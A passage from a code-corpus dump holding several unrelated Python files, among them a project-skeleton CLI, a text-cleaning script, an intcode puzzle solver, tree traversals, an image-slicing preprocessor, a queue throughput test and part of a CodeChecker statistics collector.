clean_name\n\n return clean_name, project_path\n\n\ndef build_skell(user_module, class_name, class_args):\n ''' make_skell '''\n\n if user_module:\n module_name = 'user_skells'\n path = os.path.join(\n os.environ['XDG_CONFIG_HOME'], 'skell', 'user_skells.py')\n else:\n module_name = 'default_skells'\n # get the real file path of this file (no symlinks)\n # and cut the file off (core.py)\n skell_path_s = os.path.split(os.path.realpath(__file__))[:-1]\n path = os.path.join(*skell_path_s, 'default_skells.py')\n\n # get the module\n spec = importlib.util\\\n .spec_from_file_location(module_name, path)\n\n # get the module\n # TODO: reread importlib\n module = importlib.util.module_from_spec(spec)\n\n # idk, something to do with loading the module to its one name space\n spec.loader.exec_module(module)\n\n # get the object specified\n build_class = getattr(module, class_name)\n\n # instantiate the class with all args\n # expecting project path and name at least\n # optional per class args\n instance = build_class(*class_args)\n\n # call the build method for the chosen skell\n instance.build()\n\n\ndef parse_args(args):\n clean_name, project_path = sanitize_base_dir(args['DESTINATION'])\n\n # set the build class name\n if args['--python']:\n class_name = 'Python'\n\n elif args['--gitignore']:\n class_name = 'GitIgnore'\n\n elif args['--javascript']:\n class_name = 'JavaScript'\n\n elif args['--venv']:\n class_name = 'Venv'\n\n elif args['--blank']:\n class_name = 'BlankProject'\n\n elif args['SKELL_TYPE']:\n class_name = args['SKELL_TYPE']\n\n # get default project class from settings\n elif args['--one']:\n class_name = settings.FLAG_ONE\n elif args['--two']:\n class_name = settings.FLAG_TWO\n 
elif args['--three']:\n class_name = settings.FLAG_THREE\n\n # set class args\n if not args['--opt']:\n class_args = [project_path, clean_name]\n elif args['--opt']:\n class_args = [project_path, clean_name, *args['--opt'].split(',')]\n\n return class_name, class_args\n\n\ndef lord_func(args):\n ''' the start function '''\n\n # parse args and get all build options\n # class_name, class_args, = parse_args(args)\n\n # pass options to build class\n # build_skell(class_name, class_args)\n\n # --module is ether True or None\n # user_module = args['--module']\n\n build_args = parse_args(args)\n return\n\n build_skell(args['--module'], *build_args)\n\n\nif __name__ == '__main__':\n args = docopt(__doc__)\n print(args)\n lord_func(args)\n","sub_path":"docs/keep.py","file_name":"keep.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306211590","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport os \r\nimport pandas as pd\r\n\r\nos.chdir('C:\\\\Users\\\\shimm\\\\downloads')\r\n\r\n\r\n# plague_by_word = open(\"plague_by_word.txt\", \"w\")\r\n#new_plague = open(\"newplague.txt\", \"w\")\r\nwith open(\"Camus Albert - The Plague.txt\") as f:\r\n flat = f.readlines()\r\nfor line in range(len(flat)) :\r\n if flat[line] != \"\\n\":\r\n words = flat[line].split(\" \")\r\n for word in words:\r\n if word != \"\\n\":\r\n new_plague.write(word + \"\\n\")\r\n#the seperated files of parts where created manually from new_plague.txt\r\ndf_part_1 = pd.read_csv(\"plague_part_1_new\", sep=\"\\n\", encoding='latin-1')\r\ndf_part_2 = pd.read_csv(\"plague_part_2_new\", sep=\"\\n\", encoding='latin-1')\r\ndf_part_3 = pd.read_csv(\"plague_part_3_new\", sep=\"\\n\", encoding='latin-1')\r\ndf_part_4 = pd.read_csv(\"plague_part_4_new\", sep=\"\\n\", encoding='latin-1')\r\ndf_part_5 = pd.read_csv(\"plague_part_5_new\", sep=\"\\n\", encoding='latin-1')\r\n\r\np1_lst = [\"part_1\"] * len(df_part_1)\r\np2_lst = [\"part_2\"] * len(df_part_2)\r\np3_lst = [\"part_3\"] * len(df_part_3)\r\np4_lst = [\"part_4\"] * len(df_part_4)\r\np5_lst = [\"part_5\"] * len(df_part_5)\r\n \r\ndf_part_1[\"part\"] = p1_lst\r\ndf_part_2[\"part\"] = p2_lst\r\ndf_part_3[\"part\"] = p3_lst\r\ndf_part_4[\"part\"] = p4_lst\r\ndf_part_5[\"part\"] = p5_lst\r\n\r\ndf = pd.concat([df_part_1, df_part_2, df_part_3, df_part_4, df_part_5])\r\ndf['count'] = range(1, len(df) + 1)\r\ndf[\"new_column\"] = df['Word'].str.replace('[^\\w\\s]','') \r\ndf= df.applymap(lambda s:s.lower() if type(s) == str else s)\r\n\r\ndf.to_csv(\"plague_by_part_by_word.csv\")\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"dig_hum_py_cleaning.py","file_name":"dig_hum_py_cleaning.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"425154200","text":"import sys \nsys.path.append('../intcode')\n\nimport intcode\n\nwith open(\"day2.input\") as file:\n program = [int(val) for val in file.read().split(',')]\n\nprogram[1] = 12\nprogram[2] = 2\n\ncomputer = intcode.IntCode()\ncomputer.load_program(program)\ncomputer.run_program()\nprint(computer.memory[0])\nprint(computer.memory)\n\nwanted = 19690720\n\nfor noun in range(0,100):\n for verb in range(0,100):\n program[1] = noun\n program[2] = verb\n computer.load_program(program)\n computer.run_program()\n if (computer.memory[0] == wanted):\n print(100*noun+verb)\n sys.exit(0)\n\nprint(\"Not 
found\")\n","sub_path":"2/day2_intcode.py","file_name":"day2_intcode.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"532707180","text":"from ConfigSpace.configuration_space import ConfigurationSpace\r\nfrom ConfigSpace.hyperparameters import UniformFloatHyperparameter, \\\r\n UniformIntegerHyperparameter, CategoricalHyperparameter, \\\r\n UnParametrizedHyperparameter, Constant\r\nfrom automl.utl import json_utils\r\n\r\ncs = ConfigurationSpace()\r\n\r\n# the smoothing parameter is a non-negative float\r\n# I will limit it to 1000 and put it on a logarithmic scale. (SF)\r\n# Please adjust that, if you know a proper range, this is just a guess.\r\nalpha = UniformFloatHyperparameter(name=\"alpha\", lower=1e-2, upper=100,\r\n default_value=1, log=True)\r\n\r\nfit_prior = CategoricalHyperparameter(name=\"fit_prior\",\r\n choices=[\"True\", \"False\"],\r\n default_value=\"True\")\r\n\r\ncs.add_hyperparameters([alpha, fit_prior])\r\n\r\njson_utils.write_cs_to_json_file(cs, \"BernoulliNB\")\r\n","sub_path":"examples/components_json_generator/classification_json_generator/bernoulli_NB.py","file_name":"bernoulli_NB.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535336109","text":"from io import open\nfrom os import path as op\n\nfrom setuptools import setup\n\nbasedir = op.abspath(op.dirname(__file__))\nversion = open(op.join(basedir, \"VERSION\")).read().strip()\n\nsetup(\n name=\"CrackerJack\",\n version=version,\n packages=[\"crackerjack\"],\n test_suite=\"pytest\",\n include_package_data=True,\n license=\"BSD 3-clause\",\n versions=[version],\n py_modules=[\"crackerjack\"],\n description=\"PEP 8000 - crackerjack code formatting style.\",\n long_description=open(op.join(basedir, \"README.md\")).read(),\n long_description_content_type=\"text/markdown\",\n url=\"https://gitlab.com/lesleslie/crackerjack\",\n author=\"Les Leslie\",\n author_email=\"les@wedgwoodwebworks.com\",\n maintainer=\"Les Leslie\",\n maintainer_email=\"les@wedgwoodwebworks.com\",\n entry_points={\n \"console_scripts\": [\"crackerjack=crackerjack.crackerjack:crackerjack\"]\n },\n classifiers=[\n \"Environment :: Console\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.7\",\n ],\n keywords=\"black\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"182477348","text":"import xml.etree.ElementTree as ET\nimport xmltodict\nimport json\n\n''' This program converts an xml file to json \n XML can be tricky to convert; this may need some more testing\n Source: https://towardsdatascience.com/the-easy-way-to-work-with-csv-json-and-xml-in-python-5056f9325ca9\n \n Online XML to JSON converter: http://www.utilities-online.info/xmltojson/#.XuDTRs9Kjw8\n \n'''\n\ntree = ET.parse('data/books.xml')\nxml_data = tree.getroot()\n\nxmlstr = ET.tostring(xml_data, encoding='utf8', method='xml')\n\n\ndata_dict = dict(xmltodict.parse(xmlstr))\n\nprint(data_dict)\n\nwith open('data/new_data_2.json', 'w+') as json_file:\n json.dump(data_dict, json_file, indent=4, sort_keys=True)\n 
","sub_path":"convert_xml_to_csv.py","file_name":"convert_xml_to_csv.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"95551866","text":"# python3\n\"\"\"\nYou are given a rooted binary tree.\nBuild and output its in-order, pre-order and post-order traversals.\n\nThis version turned out to work slower than tree_traversal2.py\n\"\"\"\nimport sys\nimport threading\n\nsys.setrecursionlimit(10 ** 6) # max depth of recursion\nthreading.stack_size(2 ** 27) # new thread will get stack of such size\n\n\ndef walk(f):\n res = []\n\n def wrapper(*args):\n res.extend(i for i in f(*args))\n return res\n\n return wrapper\n\n\nclass TreeOrders:\n def __init__(self):\n next(sys.stdin)\n self.tree = [tuple(map(int, line.split())) for line in sys.stdin]\n\n @walk\n def in_order(self, i):\n stack = []\n while i != -1:\n stack.append(i)\n i = self.tree[i][1]\n\n while stack:\n i = stack.pop()\n yield self.tree[i][0]\n\n if self.tree[i][2] != -1:\n self.in_order(self.tree[i][2])\n\n @walk\n def pre_order(self, i):\n stack = []\n while i != -1:\n yield self.tree[i][0]\n stack.append(i)\n i = self.tree[i][1]\n\n while stack:\n i = stack.pop()\n if self.tree[i][2] != -1:\n self.pre_order(self.tree[i][2])\n\n @walk\n def post_order(self, i):\n stack = []\n while i != -1:\n stack.append(i)\n i = self.tree[i][1]\n\n while stack:\n i = stack.pop()\n if self.tree[i][2] != -1:\n self.post_order(self.tree[i][2])\n\n yield self.tree[i][0]\n\n\ndef main():\n tree = TreeOrders()\n print(*tree.in_order(0))\n print(*tree.pre_order(0))\n print(*tree.post_order(0))\n\n\nthreading.Thread(target=main).start()\n","sub_path":"data_structures/binary_search_trees/tree_traversals/tree_traversal.py","file_name":"tree_traversal.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"29107419","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 6 16:58:22 2018\n\n@author: xavier.qiu\n\"\"\"\n\n#class PreProcess(object):\n# \n# def sliceImg(image_, mask_imgs, output_shape = (256,256), img_id = '', dirPath = ''):\n# if dirPath == '':\n# dirPath = os.getcwd()\n# \n# rows = (int)((image_.shape[0]-1) / output_shape[0])+1\n# cols = (int)((image_.shape[1]-1) / output_shape[1])+1\n# \n# for y in range(rows):\n# y_end = (y+1) * output_shape[0]\n# if y == rows - 1:\n# y_end = image_.shape[0]\n# for x in range(cols):\n# x_end = (x+1) * output_shape[1]\n# if x == cols - 1:\n# x_end = image_.shape[1]\n# print(y_end)\n# print(x_end)\n# img_temp = img[y_end - output_shape[0]: y_end, x_end - output_shape[1]: x_end]\n# \n# valid_mask = list()\n# for mask in mask_imgs:\n# mask_temp = mask[y_end - output_shape[0]: y_end, x_end - output_shape[1]: x_end]\n# if np.any(mask_temp):\n# valid_mask.append(mask_temp)\n# if len(valid_mask) == 0:\n# continue\n# else:\n# id__ = 'i' + getNameFromTime()\n# os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__))\n# os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__+'/images/'))\n# os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__+'/masks/'))\n# \n# path___ = os.path.join(dirPath,'stage1_train_copy/'+id__+'/images/'+id__+'.png')\n# imsave(path___,img_temp)\n# for mask_ in valid_mask:\n# mask_id = 'm'+ getNameFromTime()\n# path__m = os.path.join(dirPath,'stage1_train_copy/'+id__+'/masks/'+mask_id+'.png')\n# imsave(path__m,mask_)\n#\n# \n# def __init__(self, \n# remove_errorness = 
False,\n# shape_after_slice = (256,256),\n# processed = False):\n# self.remove_errorness = remove_errorness\n# self.shape_after_slice = shape_after_slice\n# self.processed = processed\n# \n# def preprocess(self, preprocess_again = False):\n# \n# IMG_CHANNELS = 3\n#\n# if self.processed and not preprocess_again:\n# pass\n# \n## os.system('rm -rf stage1_train_copy')\n## os.system('mkdir stage1_train_copy')\n## dir_util.copy_tree('stage1_train/','stage1_train_copy/')\n# \n# #1. \n# \n# os.system('rm -rf stage1_train_copy')\n# os.system('mkdir stage1_train_copy')\n# \n# cwd = os.getcwd()\n# TRAIN_PATH = 'stage1_train/'\n# TEST_PATH = 'stage1_test/'\n# \n# train_ids = next(os.walk(TRAIN_PATH))[1]\n# test_ids = next(os.walk(TEST_PATH))[1]\n# \n# print('Getting and resizing train images and masks ... ')\n# \n# for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):\n# path = TRAIN_PATH + id_\n# image__ = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\n## print(img.shape)\n# mask_imgs = list()\n# temp_imgs = next(os.walk(path+'/masks/'))[2]\n# assert len(temp_imgs) > 0\n# for mask in temp_imgs:\n# mask_img = imread(path+'/masks/'+mask)\n# mask_imgs.append(mask_img)\n# self.sliceImg(image__,mask_imgs,img_id = id_)\n# \n#\n#pp = PreProcess()\n#pp.preprocess()\n\n#%%\nimport os\nfrom tqdm import tqdm\nfrom skimage.io import imread, imsave\nimport numpy as np\nimport datetime\nimport cv2\n\nproblem_ids = list()\n'''problem_ids.append('7b38c9173ebe69b4c6ba7e703c0c27f39305d9b2910f46405993d2ea7a963b80')\nproblem_ids.append('b1eb0123fe2d8c825694b193efb7b923d95effac9558ee4eaf3116374c2c94fe')\nproblem_ids.append('9bb6e39d5f4415bc7554842ee5d1280403a602f2ba56122b87f453a62d37c06e')\nproblem_ids.append('1f0008060150b5b93084ae2e4dabd160ab80a95ce8071a321b80ec4e33b58aca')\nproblem_ids.append('58c593bcb98386e7fd42a1d34e291db93477624b164e83ab2afa3caa90d1d921')\nproblem_ids.append('adc315bd40d699fd4e4effbcce81cd7162851007f485d754ad3b0472f73a86df')\nproblem_ids.append('12aeefb1b522b283819b12e4cfaf6b13c1264c0aadac3412b4edd2ace304cb40')\nproblem_ids.append('0a7d30b252359a10fd298b638b90cb9ada3acced4e0c0e5a3692013f432ee4e9')\n'''\n\ndef getNameFromTime():\n now = datetime.datetime.now()\n return (str)(now.minute)+(str)(now.second) + (str)(now.microsecond)\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nIMG_CHANNELS = 3\n \ndef sliceImg(img, mask_imgs, output_shape = (256,256), img_id = '', dirPath = ''):\n \n \"\"\"\n slice an image into several 256 * 256, \n for example, for a 360*360 image, we will divide it into 4 subimages to feed to model\n cause compression will loss some information that we can make use of, so \n \"\"\"\n \n if dirPath == '':\n dirPath = os.getcwd()\n \n rows = (int)((img.shape[0]-1) / output_shape[0])+1\n cols = (int)((img.shape[1]-1) / output_shape[1])+1\n \n for y in range(rows):\n y_end = (y+1) * output_shape[0]\n if y == rows - 1:\n y_end = img.shape[0]\n for x in range(cols):\n x_end = (x+1) * output_shape[1]\n if x == cols - 1:\n x_end = img.shape[1]\n# print(y_end)\n# print(x_end)\n img_temp = img[y_end - output_shape[0]: y_end, x_end - output_shape[1]: x_end]\n# plt.figure()\n# plt.imshow(img_temp)\n \n valid_mask = list()\n for mask in mask_imgs:\n mask_temp = mask[y_end - output_shape[0]: y_end, x_end - output_shape[1]: x_end]\n if np.any(mask_temp):\n valid_mask.append(mask_temp)\n if len(valid_mask) == 0:\n continue\n else:\n id__ = 'i' + getNameFromTime()\n os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__))\n 
os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__+'/images/'))\n os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__+'/masks/'))\n \n path___ = os.path.join(dirPath,'stage1_train_copy/'+id__+'/images/'+id__+'.png')\n imsave(path___,img_temp)\n for mask_ in valid_mask:\n mask_id = 'm'+ getNameFromTime()\n path__m = os.path.join(dirPath,'stage1_train_copy/'+id__+'/masks/'+mask_id+'.png')\n imsave(path__m,mask_)\n \n\nos.system('rm -rf stage1_train_copy')\nos.system('mkdir stage1_train_copy')\nTRAIN_PATH = 'stage1_train/'\nTEST_PATH = 'stage1_test/'\n\ntrain_ids = next(os.walk(TRAIN_PATH))[1]\n#test_ids = next(os.walk(TEST_PATH))[1]\n\nprint('Getting and resizing train images and masks ... ')\n\nfor n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):\n \n if id_ in problem_ids:\n continue\n \n path = TRAIN_PATH + id_\n if not os.path.exists(path + '/masks/') or os.listdir(path+'/masks/') == [] :\n continue\n image__ = cv2.imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\n if image__.shape[0] <= 256 and image__.shape[1] <= 256:\n continue\n if image__.shape[0] < 256 or image__.shape[1] < 256:\n continue\n mask_imgs = list()\n \n \n temp_imgs = next(os.walk(path+'/masks/'))[2]\n assert len(temp_imgs) > 0\n for mask in temp_imgs:\n mask_img = cv2.imread(path+'/masks/'+mask)\n mask_imgs.append(mask_img)\n\n sliceImg(image__,mask_imgs,img_id = id_)","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"521256514","text":"import queue\nimport random\nimport threading\nimport time\n\nimport pandas as pd\n\nNUMBER_OF_EVENTS = 100000\nBATCH_SIZE_TO_USE_IN_TPS_CALCULATION = 10000\n\n\ndef event_producer(number_of_events):\n event_counter = 0\n while True:\n event_data = {\"time\": time.time(), \"obs_id\": random.randint(1, 30), \"throughput\": random.randint(1, 5000)}\n event_counter = event_counter + 1\n event_queue.put(event_data)\n if event_counter == number_of_events:\n event_queue.task_done()\n break\n\n\ndef event_taker(tps_calculation_batch_size, number_of_events):\n start_time = time.time();\n event_batch_count = 0\n total_event_count = 0\n tps_values = {}\n sum_time = 0\n while True:\n item = event_queue.get()\n event_batch_count = event_batch_count + 1\n total_event_count = total_event_count + 1\n if event_batch_count == tps_calculation_batch_size:\n end_time = time.time();\n sum_time = (end_time - start_time + sum_time)\n tps_values[round((sum_time * 1000), 2)] = round(get_tps(tps_calculation_batch_size, end_time, start_time),2)\n start_time = end_time\n event_batch_count = 0\n if total_event_count == number_of_events:\n tps_data_frame = pd.DataFrame(tps_values.items(), columns=['Time (ms)', 'TPS (requests/second)'])\n tps_data_frame.to_csv(\"single-queue-single-reader.csv\", encoding='utf-8', index=False)\n print(tps_data_frame)\n break\n\n\ndef get_tps(tps_calculation_batch_size, end_time, start_time):\n return tps_calculation_batch_size / (end_time - start_time)\n\n\nevent_queue = queue.Queue()\nthreading.Thread(target=event_taker, args=(BATCH_SIZE_TO_USE_IN_TPS_CALCULATION, NUMBER_OF_EVENTS,),\n daemon=True).start()\n\nthreading.Thread(target=event_producer, args=(NUMBER_OF_EVENTS,), 
daemon=True).start()\n\n\nevent_queue.join()\n","sub_path":"queue_single_writer_single_reader.py","file_name":"queue_single_writer_single_reader.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"241002875","text":"# -------------------------------------------------------------------------\n# The CodeChecker Infrastructure\n# This file is distributed under the University of Illinois Open Source\n# License. See LICENSE.TXT for details.\n# -------------------------------------------------------------------------\n\n\"\"\"\nCalculates call statistics from analysis output\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import BytesIO as StringIO\nfrom collections import defaultdict\nimport os\nimport re\n\nfrom codechecker_common.logger import get_logger\n\nfrom ..flag import has_flag\nfrom ..flag import prepend_all\n\nLOG = get_logger('analyzer')\n\n\ndef build_stat_coll_cmd(action, config, source):\n \"\"\"\n Build the statistics collector analysis command.\n \"\"\"\n\n cmd = [config.analyzer_binary, '-c', '-x', action.lang, '--analyze',\n # Do not warn about the unused gcc/g++ arguments.\n '-Qunused-arguments',\n '--analyzer-output', 'text']\n\n for plugin in config.analyzer_plugins:\n cmd.extend([\"-Xclang\", \"-plugin\",\n \"-Xclang\", \"checkercfg\",\n \"-Xclang\", \"-load\",\n \"-Xclang\", plugin])\n\n cmd.extend(['-Xclang',\n '-analyzer-opt-analyze-headers'])\n\n cmd.extend(config.analyzer_extra_arguments)\n cmd.extend(action.analyzer_options)\n\n # Enable the statistics collector checkers only.\n collector_checkers = []\n for checker_name, _ in config.checks().items():\n if SpecialReturnValueCollector.checker_collect in checker_name:\n collector_checkers.append(checker_name)\n\n if ReturnValueCollector.checker_collect in checker_name:\n collector_checkers.append(checker_name)\n\n if not collector_checkers:\n LOG.debug('No available statistics collector checkers were found')\n return [], False\n\n for coll_check in collector_checkers:\n cmd.extend(['-Xclang',\n '-analyzer-checker=' + coll_check])\n\n compile_lang = action.lang\n if not has_flag('-x', cmd):\n cmd.extend(['-x', compile_lang])\n\n if not has_flag('--target', cmd) and \\\n action.target.get(compile_lang, \"\") != \"\":\n cmd.append(\"--target=\" + action.target[compile_lang])\n\n if not has_flag('-std', cmd) and not has_flag('--std', cmd):\n cmd.append(action.compiler_standard.get(compile_lang, \"\"))\n\n cmd.extend(prepend_all(\n '-isystem',\n action.compiler_includes.get(compile_lang, [])))\n\n if source:\n cmd.append(source)\n return cmd, True\n\n\nclass SpecialReturnValueCollector(object):\n \"\"\"\n Collect special return value statistics.\n\n This script lists functions of which the return\n\n value is checked for negative (integers) or null (pointers).\n \"\"\"\n\n # Checker name used for pre analysis.\n checker_collect = 'statisticscollector.SpecialReturnValue'\n\n # Checker name which runs the analysis.\n checker_analyze = 'statisticsbased.SpecialReturnValue'\n\n def __init__(self, stats_min_sample_count,\n stats_relevance_threshold):\n\n self.stats_min_sample_count = stats_min_sample_count\n self.stats_relevance_threshold = stats_relevance_threshold\n # Matching these lines\n \"\"\"\"/.../x.c:551:12: warning:\n Special Return Value:/.../x.c:551:12,parsedate,0,0\n \"\"\"\n 
ptrn = \\\n r'.*warning: Special Return Value:'\\\n '.*:[0-9]*:[0-9]*.*,(.*),([0,1]),([0,1])'\n self.special_ret_val_regexp = re.compile(ptrn)\n\n # collected statistics\n self.stats = {\n 'total': defaultdict(int),\n 'nof_negative': defaultdict(int),\n 'nof_null': defaultdict(int)\n }\n\n @staticmethod\n def stats_file(path):\n return os.path.join(path, 'SpecialReturn.yaml')\n\n @staticmethod\n def checker_analyze_cfg(path):\n \"\"\"\n Return the checker config parameter for the analyzer checker.\n \"\"\"\n if not os.path.exists(SpecialReturnValueCollector.stats_file(path)):\n LOG.debug('No checker statistics file was found for %s',\n SpecialReturnValueCollector.checker_analyze)\n return []\n else:\n return ['-Xclang', '-analyzer-config',\n '-Xclang',\n 'alpha.ericsson.statisticsbased:APIMetadataPath=' + path]\n\n def total(self):\n return self.stats.get('total')\n\n def nof_null(self):\n return self.stats.get('nof_null')\n\n def nof_negative(self):\n return self.stats.get('nof_negative')\n\n def process_line(self, line):\n \"\"\"\n Match regex on the line\n \"\"\"\n m = self.special_ret_val_regexp.match(line)\n if m:\n func = m.group(1)\n ret_negative = m.group(2)\n ret_null = m.group(3)\n\n self.stats['total'][func] += 1\n self.stats['nof_negative'][func] += int(ret_negative)\n self.stats['nof_null'][func] += int(ret_null)\n\n def filter_stats(self):\n\n neg = []\n null = []\n stats = self.stats\n total = stats.get('total')\n\n for key in sorted(stats.get('total').keys()):\n negative_ratio = stats['nof_negative'][key]/stats['total'][key]\n if (self.stats_relevance_threshold < negative_ratio < 1 and\n total[key] >= self.stats_min_sample_count):\n neg.append(key)\n\n null_ratio = stats['nof_null'][key]/stats['total'][key]\n if (self.stats_relevance_threshold < null_ratio < 1 and\n total[key] >= self.stats_min_sample_count):\n null.append(key)\n return neg, null\n\n def get_yaml(self):\n \"\"\"\n FIXME proper yaml generation.\n \"\"\"\n stats_yaml = StringIO()\n\n stats_yaml.write(\"#\\n\")\n stats_yaml.write(\"# SpecialReturn metadata format 1.0\\n\")\n neg, null = self.filter_stats()\n\n for n in neg:\n stats_yaml.write(\n \"{name: \" + n + \", relation: LT, value: 0}\\n\")\n for n in null:\n stats_yaml.write(\n \"{name: \" + n + \", relation: EQ, value: 0}\\n\")\n\n return stats_yaml.getvalue()\n\n\nclass ReturnValueCollector(object):\n \"\"\"\n Collect return value statistics.\n This script lists functions of which the return value is mostly checked.\n \"\"\"\n\n # Checker name used for pre analysis.\n checker_collect = 'statisticscollector.ReturnValueCheck'\n\n # Checker name which runs the analysis.\n checker_analyze = 'statisticsbased.UncheckedReturnValue'\n\n def __init__(self, stats_min_sample_count,\n stats_relevance_threshold):\n\n self.stats_min_sample_count = stats_min_sample_count\n self.stats_relevance_threshold = stats_relevance_threshold\n # Matching these lines\n \"\"\"\n /.../x.c:551:12:\n warning: Return Value Check:/.../x.c:551:12,parsedate,0\n \"\"\"\n\n self.ret_val_regexp = \\\n re.compile(r'.*warning: Return Value Check:'\n '.*:[0-9]*:[0-9]*.*,(.*),([0,1])')\n\n self.stats = {'total': defaultdict(int),\n 'nof_unchecked': defaultdict(int)}\n\n @staticmethod\n def stats_file(path):\n return os.path.join(path, 'UncheckedReturn.yaml')\n\n @staticmethod\n def checker_analyze_cfg(path):\n \"\"\"\n Return the checker config parameter for the analyzer checker.\n \"\"\"\n if not os.path.exists(ReturnValueCollector.stats_file(path)):\n LOG.debug('No checker statistics file 
was found for %s',\n ReturnValueCollector.checker_analyze)\n return []\n else:\n return ['-Xclang', '-analyzer-config',\n '-Xclang',\n 'alpha.ericsson.statisticsbased:APIMetadataPath=' + path]\n\n def total(self):\n return self.stats.get('total')\n\n def nof_unchecked(self):\n return self.stats.get('nof_unchecked')\n\n def unchecked(self):\n return self.stats.get('unchecked')\n\n def process_line(self, line):\n \"\"\"\n Match regex on the line\n \"\"\"\n m = self.ret_val_regexp.match(line)\n if m:\n func = m.group(1)\n checked = m.group(2)\n self.stats['total'][func] += 1\n self.stats['nof_unchecked'][func] += int(checked)\n\n def filter_stats(self):\n \"\"\"\n Filter the collected statistics based on the threshold.\n Return a lisf of function names where the return value\n was unchecked above the threshold.\n \"\"\"\n unchecked_functions = []\n total = self.stats.get('total')\n for key in sorted(total):\n checked_ratio = 1 - \\\n self.stats['nof_unchecked'][key]/self.stats['total'][key]\n if (self.stats_relevance_threshold < checked_ratio < 1 and\n self.stats['total'][key] >= self.stats_min_sample_count):\n unchecked_functions.append(key)\n return unchecked_functions\n\n def get_yaml(self):\n \"\"\"\n FIXME proper yaml generation.\n \"\"\"\n stats_yaml = StringIO()\n\n stats_yaml.write(\"#\\n\")\n stats_yaml.write(\"# UncheckedReturn metadata format 1.0\\n\")\n for function_name in self.filter_stats():\n stats_yaml.write(\"- \" + function_name + '\\n')\n\n return stats_yaml.getvalue()\n\n\ndef postprocess_stats(clang_output_dir, stats_dir, stats_min_sample_count,\n stats_relevance_threshold):\n \"\"\"\n Read the clang analyzer outputs where the statistics emitter checkers\n were enabled and collect the statistics.\n\n After the statistics collection cleanup the output files.\n \"\"\"\n\n # Statistics yaml files will be stored in stats_dir\n try:\n os.stat(stats_dir)\n except Exception as ex:\n LOG.debug(ex)\n os.mkdir(stats_dir)\n\n if not os.path.exists(clang_output_dir):\n LOG.debug(\"No statistics directory was found\")\n return\n\n clang_outs = []\n try:\n for f in os.listdir(clang_output_dir):\n if os.path.isfile(os.path.join(clang_output_dir, f)):\n clang_outs.append(os.path.join(clang_output_dir, f))\n except OSError as oerr:\n LOG.debug(oerr)\n LOG.debug(\"Statistics can not be collected.\")\n LOG.debug(\"Analyzer output error.\")\n return\n\n if not clang_outs:\n LOG.warning(\"No output files were found to collect statistics.\")\n return\n ret_collector = ReturnValueCollector(stats_min_sample_count,\n stats_relevance_threshold)\n special_ret_collector =\\\n SpecialReturnValueCollector(stats_min_sample_count,\n stats_relevance_threshold)\n\n for clang_output in clang_outs:\n with open(clang_output, 'r') as out:\n clang_output = \"\"\n for line in out:\n clang_output += line + \"\\n\"\n ret_collector.process_line(line)\n special_ret_collector.process_line(line)\n LOG.debug(\"Collecting statistics finished.\")\n\n # Write out statistics.\n unchecked_yaml = ReturnValueCollector.stats_file(stats_dir)\n LOG.debug(\"Writing out statistics to %s\", unchecked_yaml)\n with open(unchecked_yaml, 'w') as uyaml:\n uyaml.write(ret_collector.get_yaml())\n\n special_ret_yaml = SpecialReturnValueCollector.stats_file(stats_dir)\n LOG.debug(\"Writing out statistics to %s\", special_ret_yaml)\n with open(special_ret_yaml, 'w') as uyaml:\n 
